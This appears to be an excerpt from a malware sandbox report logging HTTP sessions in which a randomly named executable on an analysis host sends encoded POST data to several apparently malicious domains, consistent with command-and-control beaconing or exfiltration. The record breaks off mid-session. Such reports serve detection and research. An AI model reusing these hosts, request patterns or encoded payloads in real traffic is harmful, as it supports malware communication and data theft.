uWSdwG20EGczPMeg6ouSUxBww0VCCqL1CiyaL9d7bRMRG/R6p5SvRwEEeCwS0gK46kqngTGTeWNuhBwPOyhaOe1gTYU2UpBMwm5NtpnTFDrdXdb08Cf4Xj9qxHLj4EBPpXXUYuMUtfjhbzlJ0h6AFIxlZS2MdLgOxUtJbQvtPy6ItfnQBiIqFDERdW2w/RrVqP0P0y6OUybervPFSyRJHM9W/SQu3uXPVjcZn1y1I08NCrIu8DT9yNKhY/oz1UTSPwQ1GEXjZF+SEGchJRCTkDksXkk3qXexBFAsW2R [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	50018	3.33.130.190	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:18.530431032 CET	483	OUT	GET /tqc2/?CR=QnXHBNIHO&C4NDALSx=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8KkKZRC8tNqvToqyUp6DlGvulylRMCidvSnjGJ1LrCV2ZKyQ9V4A= HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:19:19.152743101 CET	413	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 04 Nov 2024 03:19:19 GMT Content-Type: text/html Content-Length: 273 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 43 52 3d 51 6e 58 48 42 4e 49 48 4f 26 43 34 4e 44 41 4c 53 78 3d 45 6b 6a 69 57 55 77 47 33 6f 68 73 2b 54 4d 34 54 6c 47 72 58 37 36 32 4d 54 78 62 4a 4e 71 42 7a 74 53 53 74 62 58 39 6a 57 53 71 67 6d 49 69 48 56 2b 47 39 65 32 32 58 4c 58 76 64 59 2b 43 70 59 4c 33 2b 4b 57 31 4c 6a 32 70 6b 6a 73 68 34 35 4b 38 4b 6b 4b 5a 52 43 38 74 4e 71 76 54 6f 71 79 55 70 36 44 6c 47 76 75 6c 79 6c 52 4d 43 69 64 76 53 6e 6a 47 4a 31 4c 72 43 56 32 5a 4b 79 51 39 56 34 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?CR=QnXHBNIHO&C4NDALSx=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8KkKZRC8tNqvToqyUp6DlGvulylRMCidvSnjGJ1LrCV2ZKyQ9V4A="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50019	172.67.206.245	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:24.204212904 CET	753	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 52 65 31 2b 35 77 74 66 41 4c 6a 67 52 43 71 6a 68 74 36 43 58 4d 66 52 70 65 78 76 32 50 6c 79 52 72 61 68 6a 39 41 73 74 79 46 76 58 66 79 46 39 4e 30 79 64 74 76 4f 44 43 58 46 69 58 6c 78 53 45 43 47 56 30 79 57 56 78 52 56 46 52 53 68 54 4d 43 6f 6c 6b 47 4a 6f 6c 33 47 38 48 31 6a 4b 6c 48 45 50 53 65 6a 78 31 2b 5a 6d 32 7a 30 52 76 7a 73 50 34 68 39 4a 7a 51 36 36 48 49 54 7a 49 45 4f 77 53 73 71 78 4b 43 30 41 64 39 5a 31 47 42 64 72 34 72 55 44 5a 47 57 32 2b 38 56 46 55 51 50 61 58 6b 48 58 36 2b 31 76 78 65 6c 73 46 6c 41 48 4f 73 38 2b 4e 2b 39 31 6d 74 4e Data Ascii: C4NDALSx=HVlZJtZ2jirmRe1+5wtfALjgRCqjht6CXMfRpexv2PlyRrahj9AstyFvXfyF9N0ydtvODCXFiXlxSECGV0yWVxRVFRShTMColkGJol3G8H1jKlHEPSejx1+Zm2z0RvzsP4h9JzQ66HITzIEOwSsqxKC0Ad9Z1GBdr4rUDZGW2+8VFUQPaXkHX6+1vxelsFlAHOs8+N+91mtN
Nov 4, 2024 04:19:25.279614925 CET	903	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SIA9GZnlFhudPwXZQndyYrYNsfupUKYumARoUlSN8wE5Chi%2B0bQDJvT%2F%2FMNAg%2BaIPqMsY2I9%2F6astC2eksy8v0cDsw9MhBlX%2BW3b7iTxXFVN8eyruQIMD5pADkmpwBuXJZ32BTqkg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd1765bc85c2cbf-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=753&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50020	172.67.206.245	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:26.754543066 CET	777	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 4c 2b 46 2b 38 54 56 66 48 72 6a 6e 53 43 71 6a 34 64 36 47 58 4d 54 52 70 66 30 77 33 35 39 79 51 4f 2b 68 69 34 73 73 6f 79 46 76 64 2f 79 64 35 4e 30 70 64 74 6a 6f 44 48 33 46 69 58 78 78 53 46 79 47 56 46 7a 6b 57 42 51 7a 65 68 53 76 58 4d 43 6f 6c 6b 47 4a 6f 6c 6a 73 38 48 64 6a 4a 55 33 45 41 54 65 69 79 31 2b 65 78 47 7a 30 47 2f 7a 6f 50 34 67 6f 4a 33 51 63 36 45 77 54 7a 49 30 4f 78 44 73 31 37 4b 43 79 64 4e 38 79 7a 54 6c 56 6a 59 69 54 44 75 2b 51 69 35 6b 4d 41 69 4e 56 47 6b 6b 6b 46 71 65 33 76 7a 47 58 73 6c 6c 71 46 4f 55 38 73 61 79 61 36 53 49 75 6e 33 61 7a 61 61 45 6d 36 39 72 79 4b 6e 63 6e 4b 6f 34 39 72 77 3d 3d Data Ascii: C4NDALSx=HVlZJtZ2jirmL+F+8TVfHrjnSCqj4d6GXMTRpf0w359yQO+hi4ssoyFvd/yd5N0pdtjoDH3FiXxxSFyGVFzkWBQzehSvXMColkGJoljs8HdjJU3EATeiy1+exGz0G/zoP4goJ3Qc6EwTzI0OxDs17KCydN8yzTlVjYiTDu+Qi5kMAiNVGkkkFqe3vzGXsllqFOU8saya6SIun3azaaEm69ryKncnKo49rw==
Nov 4, 2024 04:19:27.799388885 CET	897	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCeJVHCGv3M30bv799CF8zcwulU1GNqfypRHtZF%2F0xYglG%2FHh129wXLFJFlspT4XjQRwhHQ5TSUTyereqduBVMWYzk%2Ft1ELXgK1bYYy0KfWMgbwjbW59tVQR6EsekSQNysjIXTqoxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd1766b7e242cd4-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50021	172.67.206.245	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:29.302269936 CET	1790	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 4c 2b 46 2b 38 54 56 66 48 72 6a 6e 53 43 71 6a 34 64 36 47 58 4d 54 52 70 66 30 77 33 35 46 79 51 34 79 68 74 37 30 73 76 79 46 76 52 66 79 4a 35 4e 30 6b 64 74 37 6b 44 48 79 6e 69 52 39 78 41 7a 6d 47 63 52 6e 6b 42 78 51 7a 42 52 53 75 54 4d 43 39 6c 6b 57 4e 6f 6c 7a 73 38 48 64 6a 4a 58 2f 45 48 43 65 69 30 31 2b 5a 6d 32 7a 34 52 76 79 31 50 34 34 34 4a 33 63 71 37 31 51 54 77 73 59 4f 32 78 45 31 6d 61 43 77 63 4e 38 71 7a 54 67 4c 6a 59 75 35 44 72 71 36 69 2b 55 4d 43 43 41 31 62 6e 4d 79 48 71 61 36 7a 44 65 6f 73 78 74 36 4b 38 41 76 6e 4a 47 58 79 47 34 47 75 7a 57 34 61 37 38 71 79 2b 2f 2b 4f 53 30 34 42 74 46 32 78 45 31 74 41 6c 39 6b 75 6c 62 36 79 71 77 4e 34 35 49 72 59 58 69 72 57 49 37 4f 4d 49 71 54 6c 69 37 72 73 4b 78 55 74 38 45 64 47 64 48 62 2b 69 59 6e 73 43 76 72 51 2f 63 63 71 68 71 47 7a 43 64 76 71 61 39 58 45 71 65 59 62 59 61 4a 6b 46 34 51 74 48 32 6d 4c 78 32 44 36 57 52 44 54 52 32 52 4f 6a 6c 72 65 [TRUNCATED] Data Ascii: C4NDALSx=HVlZJtZ2jirmL+F+8TVfHrjnSCqj4d6GXMTRpf0w35FyQ4yht70svyFvRfyJ5N0kdt7kDHyniR9xAzmGcRnkBxQzBRSuTMC9lkWNolzs8HdjJX/EHCei01+Zm2z4Rvy1P444J3cq71QTwsYO2xE1maCwcN8qzTgLjYu5Drq6i+UMCCA1bnMyHqa6zDeosxt6K8AvnJGXyG4GuzW4a78qy+/+OS04BtF2xE1tAl9kulb6yqwN45IrYXirWI7OMIqTli7rsKxUt8EdGdHb+iYnsCvrQ/ccqhqGzCdvqa9XEqeYbYaJkF4QtH2mLx2D6WRDTR2ROjlreG3UAg63rrJrPm1H0NZ8zOoKPUfxjgCWR/1HxkONgpE5IeTNqQ2GnKlQuy6Oex97MFTU3ZBsf4XsUktnPIxYqM9y1x5O441l6axR7QxNl3J1xBH9NDGDAcvYKRxllRPS84qkcil3UdeNP3zLAFbcHFCuYuCx8AJHX5eUFczAoqLR+XMIQSYBRGbH2pqXmXmNXSNButJJScxcz0anUZ1gA9VolcEtjMu27KQo7x+MtBhKSJokPDTN0MSY/r9MnPeJnCfVeNUJjF7sPnfOI6PahZWSY2kKlGWSd3UzHwF8/IarvmWiPjRQXCe5EFWBdwGe5UKb7iGNGFR052c08pIwi62dI+3PmzCHNI47CCTukKAOCaKccU5K4YHqkn+sO0j4K4a21DxbC7KK3ByjOsgzfAniyyfjKMKZYEraewpkTyJbOAURekIEFbPIzvef98bpY5SuREtscH1oF/YjI6vpYdSaL3QJKEW1DNjFmVpro5AUELWL95LbWyWYAW1Gybbi939NlNrusyHvF5k0CdzjcZN7DW05ByUolwZl9rKK7tQhTzGG2wCmeUQzU2qhtrq0whgIvfTwUiJ7hyTmEweozzavm0T1seCPbsBwLZwTn6YAR9yyAf48uvHJP4hev2m5xsUiqrFWg+OXyRi9K1N96NCH/qISOWrHjmJ [TRUNCATED]
Nov 4, 2024 04:19:30.356318951 CET	902	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMQEMxH4UTR%2BZY4dVUouUJqLhazn%2FNyOFCdVEZhui2agJ2umkMhVJ%2BSg1XmCo3ASAT2Mzv%2BuVX5PRz17hUrNjNYCFuJwKGhLaW3ojgjuTCnkhWcbGujiINVsP0mbGJ07FNUMeOic%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd1767b6af66b89-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1790&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50022	172.67.206.245	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:31.851869106 CET	489	OUT	GET /igdb/?C4NDALSx=KXN5KYh60A7gMeE/7y9YbJzEbAj8u76Oa7v3ksdE5fh6bb2RqZZNkEsyTM378ew6A9/zEQ377mgRVV6fU1aJNg1uERy6ZujIlGDYuB/gpk9pFFHdCRPS72+AoRDwRP34Iqc3Ln0=&CR=QnXHBNIHO HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 4, 2024 04:19:32.854149103 CET	908	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fG7n9%2Bu0FIuPzTVlV%2FpvWEq9ARaGefQum5ZjvvEL1POgkfovZHezIs6pXsMR2wnyWXMpgFpItQqcx9VoxFHw3xHjTb0lQ2F08Wm6fST1XYkQ5CG33OTFvbQE8qFkZOEN8LwyR1Lcpw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd1768b59f64784-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1298&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50023	104.21.59.91	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:38.083873987 CET	741	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 213 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 41 58 64 4e 51 70 41 67 56 71 36 44 66 55 79 63 61 63 52 56 44 53 59 61 54 6e 39 6c 67 57 37 48 77 79 79 48 50 32 4d 79 72 52 44 61 58 2b 61 67 37 44 38 50 64 67 54 39 48 4e 2b 74 6d 2f 6a 36 4a 4f 36 65 6c 59 75 43 36 64 54 30 49 44 73 70 45 2b 70 67 70 47 2b 63 64 6f 4b 70 62 61 79 76 38 67 6a 78 75 5a 6a 2b 75 63 45 31 4f 72 36 46 73 4b 48 66 56 50 38 65 6c 6c 69 74 6a 6a 6f 61 48 6f 74 48 68 34 6e 6a 48 31 47 31 55 54 4c 36 76 4f 35 33 2f 49 46 47 5a 70 71 57 38 38 75 79 52 46 72 69 4d 73 5a 37 6b 5a 78 30 33 76 76 69 41 67 67 66 70 42 4c 6e 30 4f 54 41 31 43 6a 58 4e 76 45 51 4c 73 55 66 71 72 4e 6e Data Ascii: C4NDALSx=AXdNQpAgVq6DfUycacRVDSYaTn9lgW7HwyyHP2MyrRDaX+ag7D8PdgT9HN+tm/j6JO6elYuC6dT0IDspE+pgpG+cdoKpbayv8gjxuZj+ucE1Or6FsKHfVP8ellitjjoaHotHh4njH1G1UTL6vO53/IFGZpqW88uyRFriMsZ7kZx03vviAggfpBLn0OTA1CjXNvEQLsUfqrNn
Nov 4, 2024 04:19:38.975714922 CET	909	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6baZJzzX2UmV3qFgsKo3MvaJfWzOSc%2BG3aDN15HAtSIBa2C46%2FZ2lz2cewa3vSXAPr%2FsKPI2FlLJBt%2FW60TLQ%2F09%2BmH1WzuOJXAQpZB0KMrPX%2FI6wdB7ccTuW9V5FP0fB4w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd176b27b720c13-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1448&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50024	104.21.59.91	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 04:19:40.627063036 CET	765	OUT	POST /9tmz/ HTTP/1.1 Host: www.megaweb8.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.megaweb8.top Cache-Control: max-age=0 Content-Length: 237 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.megaweb8.top/9tmz/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 43 34 4e 44 41 4c 53 78 3d 41 58 64 4e 51 70 41 67 56 71 36 44 63 30 43 63 5a 37 4e 56 47 79 59 5a 64 48 39 6c 70 32 37 44 77 79 2b 48 50 33 59 69 72 45 7a 61 55 61 57 67 34 43 38 50 61 67 54 39 4d 74 2b 69 34 50 6a 74 4a 4f 6d 57 6c 63 75 43 36 5a 44 30 49 48 67 70 45 50 70 76 72 57 2b 65 56 49 4b 76 45 4b 79 76 38 67 6a 78 75 59 43 70 75 63 4d 31 50 66 47 46 74 76 72 51 4b 2f 38 64 6d 6c 69 74 79 7a 6f 65 48 6f 73 6b 68 36 66 4e 48 7a 43 31 55 51 66 36 75 63 52 30 6f 34 46 63 57 4a 72 65 39 76 33 61 58 6b 53 6e 4e 71 46 2f 33 70 6c 35 79 5a 79 34 63 54 67 38 37 52 72 6c 30 4d 4c 79 31 69 6a 39 50 76 38 51 5a 37 59 34 6c 66 6f 45 5a 66 6d 44 64 30 4f 75 64 73 71 7a 44 51 53 2f 35 45 6f 61 7a 41 3d 3d Data Ascii: C4NDALSx=AXdNQpAgVq6Dc0CcZ7NVGyYZdH9lp27Dwy+HP3YirEzaUaWg4C8PagT9Mt+i4PjtJOmWlcuC6ZD0IHgpEPpvrW+eVIKvEKyv8gjxuYCpucM1PfGFtvrQK/8dmlityzoeHoskh6fNHzC1UQf6ucR0o4FcWJre9v3aXkSnNqF/3pl5yZy4cTg87Rrl0MLy1ij9Pv8QZ7Y4lfoEZfmDd0OudsqzDQS/5EoazA==
Nov 4, 2024 04:19:41.498133898 CET	901	IN	HTTP/1.1 404 Not Found Date: Mon, 04 Nov 2024 03:19:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YLxt91FKQYaossBhcTSFH9axYyWIvQgGR85yWCGzwStj2j8Wbj1l68cgQXW%2B7wJfJuwnc7ijtpCoKdLNiw3TXWcVXZDEvI%2BUGGiV17LPELDXu7Q5oBLRRUzcJ%2BpTlpKdqycj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dd176c23da54620-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50025	104.21.59.91	80	2656	C:\Program Files (x86)\SNnIzBAuNXYgDdtNvgaOSiXZBMQbYzueliTmYoYS\oVmFMrJhUAa.exe

Timestamp	Bytes transferred	Direction	Data
